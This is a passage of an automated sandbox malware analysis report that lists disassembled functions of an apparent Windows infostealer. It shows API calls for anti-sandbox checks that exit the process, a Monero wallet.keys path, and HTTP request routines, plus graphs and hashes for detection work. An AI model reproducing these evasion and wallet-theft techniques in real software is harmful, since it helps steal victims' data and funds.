                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Tg
                                  • API String ID: 507064821-1752779648
                                  • Opcode ID: 02a1446b0205bc987cd6b67dace1d62dbb918423bb57d0f7c38823b489a1a25a
                                  • Instruction ID: 2b98b8c83b64b47a11272f0de3b1471b9abe1c71f9b87d6c305bc2d262a3e364
                                  • Opcode Fuzzy Hash: 02a1446b0205bc987cd6b67dace1d62dbb918423bb57d0f7c38823b489a1a25a
                                  • Instruction Fuzzy Hash: 5EE13171E10104AADB18FBB0DE96EED7378BF64340F508529B44766491EF386F09CBA2
                                  Function 00A817A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1069 a817a0-a817cd call a8aad0 StrCmpCA 1072 a817cf-a817d1 ExitProcess 1069->1072 1073 a817d7-a817f1 call a8aad0 1069->1073 1077 a817f4-a817f8 1073->1077 1078 a817fe-a81811 1077->1078 1079 a819c2-a819cd call a8a800 1077->1079 1080 a8199e-a819bd 1078->1080 1081 a81817-a8181a 1078->1081 1080->1077 1084 a81849-a81858 call a8a820 1081->1084 1085 a818ad-a818be StrCmpCA 1081->1085 1086 a818cf-a818e0 StrCmpCA 1081->1086 1087 a8198f-a81999 call a8a820 1081->1087 1088 a81821-a81830 call a8a820 1081->1088 1089 a8185d-a8186e StrCmpCA 1081->1089 1090 a8187f-a81890 StrCmpCA 1081->1090 1091 a81970-a81981 StrCmpCA 1081->1091 1092 a818f1-a81902 StrCmpCA 1081->1092 1093 a81951-a81962 StrCmpCA 1081->1093 1094 a81932-a81943 StrCmpCA 1081->1094 1095 a81913-a81924 StrCmpCA 1081->1095 1096 a81835-a81844 call a8a820 1081->1096 1084->1080 1099 a818ca 1085->1099 1100 a818c0-a818c3 1085->1100 1101 a818ec 1086->1101 1102 a818e2-a818e5 1086->1102 1087->1080 1088->1080 1118 a8187a 1089->1118 1119 a81870-a81873 1089->1119 1097 a8189e-a818a1 1090->1097 1098 a81892-a8189c 1090->1098 1112 a8198d 1091->1112 1113 a81983-a81986 1091->1113 1103 a8190e 1092->1103 1104 a81904-a81907 1092->1104 1109 a8196e 1093->1109 1110 a81964-a81967 1093->1110 1107 a8194f 1094->1107 1108 a81945-a81948 1094->1108 1105 a81930 1095->1105 1106 a81926-a81929 1095->1106 1096->1080 1120 a818a8 1097->1120 1098->1120 1099->1080 1100->1099 1101->1080 1102->1101 1103->1080 1104->1103 1105->1080 1106->1105 1107->1080 1108->1107 1109->1080 1110->1109 1112->1080 1113->1112 1118->1080 1119->1118 1120->1080
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 00A817C5
                                  • ExitProcess.KERNEL32 ref: 00A817D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: e84aba3eb1213d4dca3e8a77a1effcab10cebc8594c7fe01a4e0af78b32d2e3a
                                  • Instruction ID: af98cf1cb32cf425f5f5bb8b4ca414dd85a39857ba70aabdadc92e7e3f717e87
                                  • Opcode Fuzzy Hash: e84aba3eb1213d4dca3e8a77a1effcab10cebc8594c7fe01a4e0af78b32d2e3a
                                  • Instruction Fuzzy Hash: D65137B4B04209EFDB04EFA4D954FBE77B9BF44744F108449E406AB280E775EA52CB62
                                  Function 00A87500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1124 a87500-a8754a GetWindowsDirectoryA 1125 a8754c 1124->1125 1126 a87553-a875c7 GetVolumeInformationA call a88d00 * 3 1124->1126 1125->1126 1133 a875d8-a875df 1126->1133 1134 a875fc-a87617 GetProcessHeap RtlAllocateHeap 1133->1134 1135 a875e1-a875fa call a88d00 1133->1135 1137 a87628-a87658 wsprintfA call a8a740 1134->1137 1138 a87619-a87626 call a8a740 1134->1138 1135->1133 1145 a8767e-a8768e 1137->1145 1138->1145
                                  APIs
                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00A87542
                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A8757F
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87603
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00A8760A
                                  • wsprintfA.USER32 ref: 00A87640
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                  • String ID: :$C$Ph$\
                                  • API String ID: 1544550907-292453683
                                  • Opcode ID: 559a13883d674542af149b53101ec483a8ac47ae208fd9b4bf299355641f1a94
                                  • Instruction ID: 2a57dad7a67cedef4c973490999e50667e2ef95705ad17d1bdf4fe071a934a90
                                  • Opcode Fuzzy Hash: 559a13883d674542af149b53101ec483a8ac47ae208fd9b4bf299355641f1a94
                                  • Instruction Fuzzy Hash: 6541A6B1D04258ABDF10EF94DD45BDEBBB8FF18704F100199F50967280DB79AA44CBA5
                                  Function 00A869F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681648), ref: 00A898A1
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681618), ref: 00A898BA
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681660), ref: 00A898D2
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006817B0), ref: 00A898EA
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006817E0), ref: 00A89903
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00688BF8), ref: 00A8991B
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006754A8), ref: 00A89933
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00675588), ref: 00A8994C
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681678), ref: 00A89964
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681690), ref: 00A8997C
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006816A8), ref: 00A89995
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,006814F8), ref: 00A899AD
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00675688), ref: 00A899C5
                                    • Part of subcall function 00A89860: GetProcAddress.KERNEL32(77190000,00681510), ref: 00A899DE
                                    • Part of subcall function 00A8A740: lstrcpy.KERNEL32(00A90E17,00000000), ref: 00A8A788
                                    • Part of subcall function 00A711D0: ExitProcess.KERNEL32 ref: 00A71211
                                    • Part of subcall function 00A71160: GetSystemInfo.KERNEL32(?), ref: 00A7116A
                                    • Part of subcall function 00A71160: ExitProcess.KERNEL32 ref: 00A7117E
                                    • Part of subcall function 00A71110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00A7112B
                                    • Part of subcall function 00A71110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00A71132
                                    • Part of subcall function 00A71110: ExitProcess.KERNEL32 ref: 00A71143
                                    • Part of subcall function 00A71220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A7123E
                                    • Part of subcall function 00A71220: ExitProcess.KERNEL32 ref: 00A71294
                                    • Part of subcall function 00A86770: GetUserDefaultLangID.KERNEL32 ref: 00A86774
                                    • Part of subcall function 00A71190: ExitProcess.KERNEL32 ref: 00A711C6
                                    • Part of subcall function 00A87850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00A711B7), ref: 00A87880
                                    • Part of subcall function 00A87850: RtlAllocateHeap.NTDLL(00000000), ref: 00A87887
                                    • Part of subcall function 00A87850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00A8789F
                                    • Part of subcall function 00A878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A87910
                                    • Part of subcall function 00A878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00A87917
                                    • Part of subcall function 00A878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00A8792F
                                    • Part of subcall function 00A8A9B0: lstrlen.KERNEL32(?,006888B8,?,\Monero\wallet.keys,00A90E17), ref: 00A8A9C5
                                    • Part of subcall function 00A8A9B0: lstrcpy.KERNEL32(00000000), ref: 00A8AA04
                                    • Part of subcall function 00A8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A8AA12
                                    • Part of subcall function 00A8A8A0: lstrcpy.KERNEL32(?,00A90E17), ref: 00A8A905
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A86AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00A86AF9
                                  • Sleep.KERNEL32(00001770), ref: 00A86B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86B1A
                                  • ExitProcess.KERNEL32 ref: 00A86B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                  • String ID:
                                  • API String ID: 2931873225-0
                                  • Opcode ID: 914b5b723abd9b7590e6478fd560ec812766850c94ed17df94abf5622404cf26
                                  • Instruction ID: d7050e1fb4fb6cab2613df2354ef112437d29070b1495b44f2933a52c98acb6b
                                  • Opcode Fuzzy Hash: 914b5b723abd9b7590e6478fd560ec812766850c94ed17df94abf5622404cf26
                                  • Instruction Fuzzy Hash: E3315271E04208ABEB04FBF0DE56BEE7778AF14340F508619F252A6192DF746905C7B2
                                  Function 00A86AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1204 a86af3 1205 a86b0a 1204->1205 1207 a86aba-a86ad7 call a8aad0 OpenEventA 1205->1207 1208 a86b0c-a86b22 call a86920 call a85b10 CloseHandle ExitProcess 1205->1208 1214 a86ad9-a86af1 call a8aad0 CreateEventA 1207->1214 1215 a86af5-a86b04 CloseHandle Sleep 1207->1215 1214->1208 1215->1205
                                  APIs
                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86ACA
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00A86AE8
                                  • CloseHandle.KERNEL32(00000000), ref: 00A86AF9
                                  • Sleep.KERNEL32(00001770), ref: 00A86B04
                                  • CloseHandle.KERNEL32(?,00000000,?,00688C28,?,00A9110C,?,00000000,?,00A91110,?,00000000,00A90AEF), ref: 00A86B1A
                                  • ExitProcess.KERNEL32 ref: 00A86B22
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                  • String ID:
                                  • API String ID: 941982115-0
                                  • Opcode ID: e0bde07238c7bd1986563b61f08914ef3d7a58dc26f2337271b3b77c3309d8be
                                  • Instruction ID: 08e6ae71595344573947172eb643cb9c1f0b6d8d9b910b0b9a82adc1fc72af6d
                                  • Opcode Fuzzy Hash: e0bde07238c7bd1986563b61f08914ef3d7a58dc26f2337271b3b77c3309d8be
                                  • Instruction Fuzzy Hash: 82F05870E84209ABFB00BBA0DD0ABBEBB34FB18741F108615F952A11D1DBB15940DBA7
                                  Function 00A747B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A74839
                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00A74849
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: bc9dd9ed59e2dd19758f745234309a048ad680891ca7da9ce19c62e15ee55171
                                  • Instruction ID: c4b62d525dd4e336a6eaead9507a786f671fddc36e604927d64a2e0305a7b200
                                  • Opcode Fuzzy Hash: bc9dd9ed59e2dd19758f745234309a048ad680891ca7da9ce19c62e15ee55171
                                  • Instruction Fuzzy Hash: 402130B1D00209ABDF14EFA4ED4ABDD7B74FB44350F108625F555A7290DB706609CB91
                                  Function 00A851F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00A8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A8A7E6
                                    • Part of subcall function 00A76280: InternetOpenA.WININET(00A90DFE,00000001,00000000,00000000,00000000), ref: 00A762E1
                                    • Part of subcall function 00A76280: StrCmpCA.SHLWAPI(?,0068F400), ref: 00A76303
                                    • Part of subcall function 00A76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A76335
                                    • Part of subcall function 00A76280: HttpOpenRequestA.WININET(00000000,GET,?,0068EC88,00000000,00000000,00400100,00000000), ref: 00A76385
                                    • Part of subcall function 00A76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A763BF
                                    • Part of subcall function 00A76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A763D1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00A85228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: d53006f8232e7172384feeec9420a3e07ae24b38aedfdde288650a185e49dc96
                                  • Instruction ID: f3439906a47ba1fc8d08a9a6f69d1cb120eaf4df2b1d18cd637b3c33dc9ecf77
                                  • Opcode Fuzzy Hash: d53006f8232e7172384feeec9420a3e07ae24b38aedfdde288650a185e49dc96
                                  • Instruction Fuzzy Hash: FA110330D10148A7DB18FF74DE92AED7778AF60340F408555F81A5A592FF356B05C792
                                  Function 00A71220 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1261 a71220-a71247 call a889b0 GlobalMemoryStatusEx 1264 a71273-a7127a 1261->1264 1265 a71249-a71271 call a8da00 * 2 1261->1265 1267 a71281-a71285 1264->1267 1265->1267 1269 a71287 1267->1269 1270 a7129a-a7129d 1267->1270 1271 a71292-a71294 ExitProcess 1269->1271 1272 a71289-a71290 1269->1272 1272->1270 1272->1271
                                  APIs
                                  • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00A7123E
                                  • ExitProcess.KERNEL32 ref: 00A71294
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1297793080.0000000000A71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                  • Associated: 00000000.00000002.1297776705.0000000000A70000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B21000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B2D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000B52000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1297793080.0000000000CBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000CCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000E58000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298027178.0000000000F6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298376068.0000000000F6F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298508561.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1298529738.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_a70000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitGlobalMemoryProcessStatus
                                  • String ID: @
                                  • API String ID: 803317263-2766056989
                                  • Opcode ID: f47545b307b5efd9c85b7ba1c3ff81eb278de6ecbc69601a317453b9b58b6878
